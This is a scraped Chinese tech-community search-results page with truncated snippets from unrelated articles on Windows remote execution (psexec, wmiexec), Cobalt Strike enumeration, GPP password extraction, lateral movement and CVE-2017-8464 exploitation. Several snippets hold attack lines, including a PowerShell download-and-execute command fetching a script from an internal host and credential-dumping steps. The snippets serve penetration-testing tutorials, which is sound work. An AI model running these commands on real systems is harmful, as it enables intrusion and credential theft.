首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
您找到你想要的搜索结果了吗?
是的
没有找到

如何在远程系统执行程序

,不使用3389 Tips: 解决工作组环境无法远程登陆执行程序的方法: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies...条件: 启动WMI服务,开放135端口 本地安全策略的“网络访问: 本地账户的共享和安全模式”应设为“经典-本地用户以自己的身份验证” 4、wmiexec 使用VBS脚本调用WMI来模拟psexec的功能...,基本psexec能用的地方,这个脚本也能够使用。...条件: 启动WMI服务,开放135端口 本地安全策略的“网络访问: 本地账户的共享和安全模式”应设为“经典-本地用户以自己的身份验证” 5、powershell remoting 实现在目标主机远程执行程序后...关闭,无法使用at、schtasks 3、Windows Management Instrumentation服务关闭,关闭135端口无法使用wmic、wmiexec 4、不支持3389 那么,如何在目标主机远程执行程序

1.6K20

如何使用Hyper-VWindows 10创建Ubuntu虚拟机

作为这种将Linux从敌人变成朋友的一部分,微软允许用户Windows 10之上运行Linux,使用已经非常著名的Windows Linux子系统。...从本周开始,使用Hyper-V创建一个Ubuntu虚拟机实际是可能的,而这一切只需要几分钟。 首先,Ubuntu虚拟机允许您在Windows 10运行Linux,而不必离开操作系统。...在此之前,您应该知道的是,为了具有Hyper-V的Windows 10创建虚拟机,您需要在操作系统安装此组件。 Hyper-V Manager是Hyper-V软件包的一部分。...默认情况下,它应该被禁用,因此请选中此选项并单击“确定”。 设备需要重新启动才能完成安装,因此请确保安装Hyper-V之前保存您的工作。...现在,我的Windows 10测试设备,有四个选项,如下所示: MSIX Packaging Tool Environment Ubuntu 18.04.2.

2.2K30

psexec工具的使用

本地用户登录域成员主机 MSF中的psexec模块 Impacket中的psexec.py psexec 是 windows 下非常好的一款远程命令行工具。...psexec.exe依赖于admin共享,而impacket下的psexec.py则依赖于admin或c psexec的基本原理是:通过管道远程目标机器创建一个psexec服务,并在本地磁盘中生成一个名为...(pc-win2008) 本地管理员:administrator 密码:root 使用本地用户登录域成员主机,也只能使用本地的 administrator 用户登录,前提是该主机没禁用administrator.../smb/psexec_psh :该模块生成的payload主要是由powershell实现的 显然powershell生成的payload免杀效果比exe的要好,但是windows xp、server2003.../psexec.py xxx 这里由于我是自己的VPS安装的Impacket框架,而靶机处在内网,所以我用代理实现互通。 #用明文密码连接 .

7.9K20

Windows:管理用户账户,密码策略和安全配置

Windows操作系统中,管理用户账户和密码策略是确保系统安全的关键步骤。...本文将探讨如何通过PowerShell和其他Windows工具管理用户账户,包括查看和设置密码策略、检查用户状态,以及导出和导入安全策略。...查看和设置密码策略 Windows中,密码策略可以确保用户账户的密码强度和安全性。这些策略包括密码长度、复杂性要求以及密码更换周期等。...Windows提供了几种方法来查看和设置这些策略: 本地密码策略:使用secpol.msc可以本地机器查看和设置密码策略。...检查本地用户的状态 使用PowerShell的Get-LocalUser命令,管理员可以查看本地用户的状态,包括账户是否启用、是否过期等信息。

79020

PS命令之操作系统远程管理及进程服务操作示例

Tips : Windows Server 平台上默认启用PowerShell远程处理, 通常不允许计算机位于公用网络Windows客户端版本启用PowerShell远程处理,但是您可以使用SkipNetworkProfileCheck...-Force # 计算机位于公用网络Windows客户端版本启用PowerShell远程处理 # 在此计算机上设置了 WinRM 以接收请求。...# 2.如何Windows操作系统的客户端版本允许从公共网络进行远程访问,对于不同版本的Windows,防火墙规则的名称可能不同; # NetSecurity模块中的Set-NetFirewallRulecmdlet...Start-Process -FilePath "powershell" -Verb RunAs # 6.此示例演示如何查找启动进程时可以使用的动词,可用的谓词由进程中运行的文件的文件扩展名决定。...启动PowerShell的后台实例,该实例即使关闭启动会话后仍保持活动状态。

7.1K40

windows常用命令

渗透测试中遇到 Windows 的概率是非常大的,那么拿到一台服务器权限之后,通常会获得一个 shell,想要进行下一步渗透,几乎都是需要通过 shell 中使用 Windows 的命令来进行渗透的...net use 增加远程共享 net use \host /u:user pass 查看域中当前的主机列表 net view /domain 查看当前域中的用户 net user /domain 增加一个本地用户...NT\CurrentVersion\winlogon" 使用 powershell 下载文件 powershell -c "(new-object System.Net.WebClient).DownloadFile...System.IO.Compression.dll /out: /platform:x64 "/cs/files/dir/*.cs" 总结 命令列出来了,剩下的就靠大家自己的电脑测试吧...,看看执行的结果,了解一下这些命令的作用,看如何在实际的渗透中应用,话不多说,有好文章的给我投稿呦。

59100

【网络安全】内网渗透(三):信息收集

虚拟机 Windows 7如何没有开启共享的话,就是如下图所示: 这时候我们去设置一个共享文件夹: 再次查询: 室友机 Windows 11: ---- 6、获取主机最近的系统操作...:post/windows/gather/dumplinks 虚拟机 Windows 7: 室友机 Windows 11: 这里博主尝试着提权再试一遍,结果报错了; ---- 7、查看补丁:...post/windows/gather/enum_patches 虚拟机 Windows 7: 室友机 Windows 11: ---- 8、scraper 脚本 虚拟机 Windows 7:...%I | findstr "TTL=" 另外 nmap masscan 扫描工具工具也可以使用powershell 框架脚本搜集信息 nishang:github.com/samratashok...… 工具使用:需要 powershell 权限运行 # 设置执行策略 Set-ExecutionPolicy RemoteSigned # 导入模块 nishang Import-Module .

21540

利用Office文档结合社会工程学手段欺骗用户执行恶意代码

Shell.Explorer.1 所述Shell.Explorer.1OLE对象(CLSID {EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B})充当嵌入Windows资源管理器或嵌入式的...例如,如果限制对C:驱动器的访问,则本地用户可以使用包含嵌入式Windows资源管理器的Office文档来规避此限制。...除了可以文档中嵌入Web浏览器之外,它还允许浏览本地计算机上的文件,以及浏览到远程位置(共享和网站)的文件。没有一些用户交互,这是不可能完成的。...但是通过使用其他可执行文件类型可以轻松避免此对话框。 ? 保护模式IE被禁用用于控件,这确实会阻止显示其他对话框——如UAC对话框。...在此模式下,将禁用文档中存在的任何嵌入对象。除非攻击者使用绕过受保护视图的漏洞,否则需要额外的社交工程来欺骗用户单击“ 启用编辑”。 ? 如何防御 用户应该注意包含以下任何对象的文档: ?

2.2K30

CS学习笔记 | 15、枚举的命令和方法

4、本地用户 本地用户Local User就是系统的一个标准用户。 当我们想在 Windows 命令行下指定一个本地的用户时,可以通过输入 ....注意:以下命令是主机中运行的结果, Cobalt Strike 中运行只需要根据命令类型命令前加上 shell 或者 powershell 即可。...Cobalt Strike 里,我们只需要使用目标的 NetBIOS 名称,而不用在意使用 IPv4 地址或者 IPv6 地址,NetBIOS 名称是每台机器的完整名称。...0x02 PowerView 渗透进入内网后,如果直接使用 Windows 的内置命令,比如 net view、net user等,可能就会被管理人员或者各种安全监控设备所发现。...PowerView 是由 Will Schroeder 开发的 PowerShell 脚本,该脚本完全依赖于 Powershell 和 VMI ,使用 PowerView 可以更好的收集内网中的信息,使用之前

70430

浅谈域渗透中的组策略及gpp运用

其中GPP最有用的特性,是某些场景存储和使用凭据,其中包括: 映射驱动(Drives.xml) 创建本地用户 数据源(DataSources.xml) 打印机配置(Printers.xml)...输入密码项是被禁用的 下面我们来演示下怎么CS下获取到GPP泄露的密码: 这里我们dc2008新建一个OU组: GPPVuln 然后该OU,我们新建个使用了GPP的本地用户密码的策略 获取到该...使用powershell-import 导入Get-GPPPassword.ps1 powershell Get-GPPPassword 加载该函数 这个powershell脚本会自动遍历SYSVOL...下的敏感文件,并且将密码解密 3.针对性用户查找,这里我们可以使用powerview 这里我们以de1ctf中的wp中的思路自己走一遍那个流程 我们指定的GPPVuln这个OU中添加个账户 下面我们演示如何在域中根据该用户名称来进行针对性的...这里演示下如何使用New-GPOIm/images/浅谈域渗透中的组策略及gpp运用teTask.ps1 1.导入powershell中管理GPO的模块&创建一个作用整个域的GPO Import-Module

1.4K10

内网渗透 | 浅谈域渗透中的组策略及gpp运用

其中GPP最有用的特性,是某些场景存储和使用凭据,其中包括: 映射驱动(Drives.xml) 创建本地用户 数据源(DataSources.xml) 打印机配置(Printers.xml) 创建/更新服务...从Windows Vista开始,LGP允许本地组策略管理单个用户和组,并允许使用“GPO Packs”独立计算机之间备份、导入和导出组策略——组策略容器包含导入策略到目标计算机的所需文件。...输入密码项是被禁用的 下面我们来演示下怎么CS下获取到GPP泄露的密码: 这里我们dc2008新建一个OU组: GPPVuln ? 然后该OU,我们新建个使用了GPP的本地用户密码的策略 ?...下面我们演示如何在域中根据该用户名称来进行针对性的GPP搜索 简单的信息收集: 1.查看域内共享 powershell get-domaincomputer|get-netshare ?...这里演示下如何使用New-GPOImmediateTask.ps1 1.导入powershell中管理GPO的模块&创建一个作用整个域的GPO Import-Module GroupPolicy –verbose

2.5K20

PowerShell系列(三):PowerShell发展历程梳理

使用Update-Help命令。...id=54616版本特性● 新增了本地用户管理模块● 5.1之后版本划分为桌面版和Core版本7PowerShell6.0 Core● 发行日期:2018年1月● 默认集成版本:Windows Server...● 最低:.NET Core 2.0版本● 下载地址:无版本特性● 基于NetCore2.0 实现了真正意义的跨平台。可以Windows、Linux、MacOS运行PowerShell6.0。...● 增加了两个小版本更新:6.1 集成Windows Server 2019版本当中,命令增加到1900多条;6.2 版本修复了一些Bug、本地语言支持方面提供了增强功能8、PowerShell7.0...=● 简化的动态错误视图和Get-Error命令行工具,可更轻松地调查错误● 兼容性层,使用户能够隐式Windows PowerShell会话中导入模块● 自动新版本通知● 直接从PowerShell

23241

Windows 系统信息收集姿势

# 查看 powershell 历史操作记录 type %appdata%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt...本地用户无法执行域命令查询域内容。...域内其他机器,查询组是net group /domain,而在域控则是net group。...2、dsquery dsquery 命令很少使用,而且限制较大仅能在域控执行,所以相对而言较为鸡肋,但是一定条件下还是具有一定的使用价值。...,对于没有相关经验的人来说看上去是懵逼状态,对于收集的信息如何使用,为什么要收集这些信息没有什么概念,但是对于正在实践的人来说,是一个参考手册,照着操作一遍,理解收集的信息有什么用,久而久之,这些就变成了自己常规的操作

2.7K21

CVE-2017-8464远程命令执行漏洞(震网漏洞)复现

2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统...当用户Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限...for x64-based Systems Microsoft Windows 7 for 32-bit Systems SP1 Microsoft Windows 7 for x64-based Systems...powershell远程快捷: powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString...('http://10.0.0.140/search.ps1');test.ps1" 7.名称为:powershell.exe 8.kali下创建监听反弹,并且可以看到成功反弹出靶机的shell: use

86220

微软发布“蠕虫级别”漏洞补丁 相关修复方法及问题解答在这里

一、【影响范围】 该漏洞影响的版本只有Win10的1903和1909两个版本(包括32位、64位Windows,包括家用版、专业版、企业版、教育版),其他系统不受影响(包括WinXP、Win7)。...1909 for ARM64-based Systems Windows Server, Version 1909 (Server Core installation 对于正在使用 windows 10...(3)内网等不便安装更新的用户,可以使用微软官方给出的临时防御措施,停用 SMBv3 中的压缩功能: 管理员身份打开powershell(键盘Windows+X,选择Windows powershell...CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force 三、【其他问题】 (1)修复漏洞后如何恢复禁用的功能...\Parameters" DisableCompression -Type DWORD -Value 0 -Force (2)如何校验禁用/恢复命令成功 管理员身份打开powershell,复制以下命令运行

42810

『权限提升系列』- 组策略首选项提权

其中GPP最有用的特性,是某些场景存储和使用凭据,其中包括: 映射驱动(Drives.xml)创建本地用户数据源(DataSources.xml)打印机配置(Printers.xml)创建/更新服务(...网管会使用域策略进行统一的配置和管理,大多数组织创建域环境后会要求加入域的计算机使用域用户密码进行登录验证。为了保证本地管理员的安全性,这些组织的网络管理员往往会修改本地管理员密码。...如下三种使用方法: powershell -executionpolicy bypass -file Get-GPPPassword.ps1 Import-Module ....微软2014年修复了组策略首选项提权漏洞,使用的方法就是不再将密码保存在组策略首选项中。...参考文章: https://www.rapid7.com/db/modules/post/windows/gather/credentials/gpp http://www.mottoin.com/detail

4.5K10

域内横向移动分析及防御

Windows Vista和Windows Server 2008开始默认禁用,此时的LM Hash为aad3b435b51404eeaad3b435b51404ee(表示为空或被禁用) NTLM Hash...dir命令时,必须使用主机名(使用IP地址就会导致错误) 票据文件注入内存的默认有效时间为10小时 目标机器不需要本地管理员权限即可进行票据传递 五、PsExec PsExec是微软官方PsTools...Management Instrumentation)是一系列工具集成 从Windows 98开始支持 可以本地或者远程管理计算机系统 使用wmiexec进行横向移动时,Windows默认不会记录...-Namespace ROOT\CIMV2 -Class Win32_DCOMApplication 2、使用DCOM远程机器执行命令 (1)调用MMC20.Application远程执行命令...Exchange时,SPN就被注册AD中了) Exchange数据库的后缀为“.edb”,存储Exchange服务器使用PowerShell可以查看相应信息 Exchange邮件的文件后缀为“.

1.4K11

“震网三代”(CVE-2017-8464)的几种利用方法与防范

早在6月13日,微软发布补丁修复编号为CVE-2017-8464的漏洞,本地用户或远程攻击者可以利用该漏洞生成特制的快捷方式,并通过可移动设备或者远程共享的方式导致远程代码执行,追溯到以前,NSA就承认利用过相似漏洞且以...CVE-2017-8464漏洞影响版本: Windows 7 Windows 8.1 Windows RT 8.1 Windows 10 Windows Server 2008 Windows Server...2008 R2 Windows Server 2012 Windows Server 2012 R2 Windows Server 2016 利用 1)Metasploit-Framework中利用...*2)PowerShell 这个使用Powershell的方法并非先前网络上流传的CVE-2017-8464复现方法。...首先下载Export-LNKPwn.ps1 注意: -需要4.0或以上.NET库版本,作者使用了一些只有PowerShell 5.0才有的构造函数(如new()),他打算将版本要求降低到

1.8K40
领券